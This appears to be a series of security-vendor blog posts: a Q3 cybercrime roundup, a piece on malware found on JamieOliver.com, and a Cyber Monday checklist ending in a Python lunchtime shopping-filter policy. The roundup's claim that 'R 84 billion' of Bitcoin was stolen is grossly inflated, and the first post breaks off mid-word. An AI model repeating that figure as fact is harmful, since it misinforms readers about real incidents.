This quarter cyber-attacks targeted multiple gaming sites, gaining access to millions of users’ personal information. These attacks were largely launched using botnets composed of smartphones, and affected users of Overwatch, World of Warcraft and Diablo 3. Further attacks saw more than 3.5 million users exposed when Dota 2 and the mobile game Clash of Kings were targeted. These are just a few of the incidents in the gaming world in the last three months.

The banking sector remained a target as attacks on ATMs, POS terminals and Bitcoin wallets become more frequent and more advanced.

A Taiwanese ATM attack this quarter showed just how advanced cybercriminals have become: they compromised the bank’s internal network and had the machines dispense over R28 million without physically tampering with the ATMs themselves.

Another big victim was Yahoo: in one of the biggest breaches of its kind, it was revealed this quarter that 500 million user accounts had been compromised in a 2014 attack.

Finally, Q3 saw the largest Bitcoin robbery to date, when R 84 billion worth of Bitcoin was stolen by hackers.

View the full PandaLabs Q3 Report for more detail on specific attacks and find out how you can protect yourself and your business from the advanc

The post Cybercrime Surges in Q3 appeared first on CyberSafety.co.za.

Pukka Firewall Lessons from Jamie Oliver

In our office I’m willing to bet that food is discussed on average three times a day. Monday mornings will be spent waxing lyrical about the culinary masterpiece we’ve managed to prepare over the weekend. Then at around 11 someone will say, “Where are we going for lunch?” Before going home that evening, maybe there’s a question about the latest eatery in town. 

I expect your office chit chat is not too dissimilar to ours, because food and what we do with it has skyrocketed in popularity over the past few years. Cookery programmes like Jamie Oliver's 30 minute meals, the Great British Bake-off and Masterchef have been a big influence. 

Our food obsession, however, might be putting us all at risk, and I don’t just mean from an expanded waistline. Cyber criminals appear to have turned their attention to the food industry, targeting Jamie Oliver’s website with malware. This is the second time that malware has been found on the site. News originally broke back in February, and the problem was thought to have been resolved. Then, following a routine site inspection on the 13th of March, webmasters found that the malware had returned, or had never been completely removed.

It’s no surprise that cyber criminals have associated themselves with Jamie Oliver, since they’ve been leeching on pop culture and celebrities for years. Back in 2008, typing a star’s name into a search engine and straying away from the official sites was a sure fire way to get malware. Now it seems they’ve cut out the middleman, going straight to the source. This malware was planted directly onto JamieOliver.com.

Apart from bad press, Jamie Oliver has come away unscathed. Nobody has been seriously affected and the situation could have been much worse had the malware got into an organisational network. 

Even with no real damage there’s an important lesson to be learned. Keep your firewall, together with the web-filtering and anti-malware signatures that work alongside it, up to date so it can identify nefarious code served in web pages or downloads. If such code tries to execute on your machine, a well-maintained firewall and its companion controls will identify it as malware; a firewall that only filters ports and addresses will not see it at all.

3 Rules for Cyber Monday


It’s nearly here again folks, and the clues are all there: planning the office Christmas party, your boss humming Rudolph the Red Nosed Reindeer and an armada of Amazon packages arriving.

Which brings me nicely to the topic of this blog: online shopping at work.

It’s official; we are ‘in love’ with online shopping. At this time of the year, it’s harder to resist temptation. Retailers conjure up special shopping events like Black Friday and Cyber Monday - all aimed at getting us to part with our hard earned cash. While online retailers rub their hands in anticipation of December 1st, for companies without proper web security, the online shopping season could turn out to be the nightmare before Christmas.

In a recent survey by RetailMeNot, a digital coupon provider, 86 percent of working consumers admitted that they planned to spend at least some time shopping or browsing online for gifts during working hours on Cyber Monday. That equates to a whole lot of lost productivity and unnecessary pressure on your bandwidth.

To help prevent distraction and clogged bandwidth, I know of one customer (and I’m sure there are others) who is allowing his employees time to shop from their desks during their lunch breaks. He’s a smart man: productivity stays high and employees stay happy.

But productivity isn’t the only concern for the IT department – cyber criminals are out in force at this time of year, trying to take advantage of big hearts and open wallets with spam and phishing emails. One click on a seemingly innocent link could take your entire network down.

To keep such bad tidings at bay, here’s a web security checklist to ensure your holiday season is filled with cheer not fear.

1.  Flexible Filtering. Set time quotas to allow online shopping access at lunchtimes, or outside of core hours. Whatever you decide is reasonable, make sure your employees are kept in the loop about what you classify as acceptable usage and communicate this through an Acceptable Usage Policy.

2.  Invest in Anti-malware and Anti-spam Controls. As inboxes start to fill with special offer emails, it gets more difficult to differentiate between legitimate emails and spam. These controls will go some way towards separating the wheat from the chaff.

3.  Issue Safety Advice to Your Employees. Ask employees to check the legitimacy of a site before purchasing anything. The locked padlock symbol shows only that the connection is encrypted and that the certificate matches the domain in the address bar; a phishing site can carry a padlock too, so the domain itself has to be the retailer’s real one. In addition, brief them to be alert for phishing scams and not to open emails, or click on links, from unknown contacts.
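Rule 1 above, time quotas that let shopping through at lunchtime or outside core hours, is easiest to reason about as a small policy function. The Python below is an added example written for this post, not code from any particular web filter; the category table, the working hours, the 45-minute quota and the host names are all assumptions, and a real gateway would take the category from its URL classification feed rather than a dictionary.

```python
from dataclasses import dataclass, field
from datetime import datetime, time

# Constructed category table. A real gateway consults its URL categorisation
# feed; these hostnames are placeholders for the example.
CATEGORIES = {
    "shop.example": "shopping",
    "deals.example": "shopping",
    "intranet.example": "business",
}


def category_of(host: str) -> str:
    """Map a hostname to a filtering category; unknown hosts are 'uncategorised'."""
    parts = host.lower().rstrip(".").split(".")
    # Walk up the labels so www.shop.example inherits shop.example's category.
    for i in range(len(parts) - 1):
        category = CATEGORIES.get(".".join(parts[i:]))
        if category:
            return category
    return "uncategorised"


@dataclass
class ShoppingPolicy:
    """Acceptable-use rule for the 'shopping' category on working days."""
    core_start: time = time(9, 0)
    core_end: time = time(17, 30)
    lunch_start: time = time(12, 0)
    lunch_end: time = time(13, 0)
    daily_quota_minutes: int = 45
    workdays: tuple = (0, 1, 2, 3, 4)  # Monday..Friday
    used_today: dict = field(default_factory=dict)  # user -> minutes consumed

    def record_usage(self, user: str, minutes: int) -> None:
        """Called by the proxy's accounting as a shopping session runs."""
        self.used_today[user] = self.used_today.get(user, 0) + minutes

    def decide(self, user: str, host: str, when: datetime) -> tuple:
        """Return (allowed, reason) for one request."""
        if category_of(host) != "shopping":
            return True, "not in the shopping category"
        if when.weekday() not in self.workdays:
            return True, "outside working days"
        now = when.time()
        in_core = self.core_start <= now < self.core_end
        in_lunch = self.lunch_start <= now < self.lunch_end
        if in_core and not in_lunch:
            return False, "shopping is blocked during core hours"
        if self.used_today.get(user, 0) >= self.daily_quota_minutes:
            return False, "daily shopping quota exhausted"
        return True, "allowed (lunch break or outside core hours)"


def simulate() -> list:
    """Constructed scenario on Cyber Monday 2018 (26 November, a Monday) and the
    Saturday before it; returns (label, allowed, reason) tuples."""
    policy = ShoppingPolicy()
    monday = datetime(2018, 11, 26)
    results = []
    for label, user, host, when in [
        ("alice 10:30 shop", "alice", "www.shop.example", monday.replace(hour=10, minute=30)),
        ("alice 10:30 intranet", "alice", "intranet.example", monday.replace(hour=10, minute=30)),
        ("alice 12:15 shop", "alice", "www.shop.example", monday.replace(hour=12, minute=15)),
    ]:
        allowed, reason = policy.decide(user, host, when)
        results.append((label, allowed, reason))
    policy.record_usage("alice", 45)  # the lunch-break session used the whole quota
    allowed, reason = policy.decide("alice", "www.shop.example", monday.replace(hour=12, minute=40))
    results.append(("alice 12:40 shop after quota", allowed, reason))
    allowed, reason = policy.decide("bob", "deals.example", monday.replace(hour=19, minute=0))
    results.append(("bob 19:00 deals", allowed, reason))
    allowed, reason = policy.decide("alice", "deals.example", datetime(2018, 11, 24, 10, 30))
    results.append(("alice saturday deals", allowed, reason))
    return results


if __name__ == "__main__":
    for label, allowed, reason in simulate():
        print(f"{label:32} {'ALLOW' if allowed else 'BLOCK':5} {reason}")
```

The order of the checks is the point: category first (so business sites are never touched by the rule), then calendar and clock, then the per-user quota. That ordering is what lets the policy be written down in the Acceptable Usage Policy in the same words the filter actually enforces.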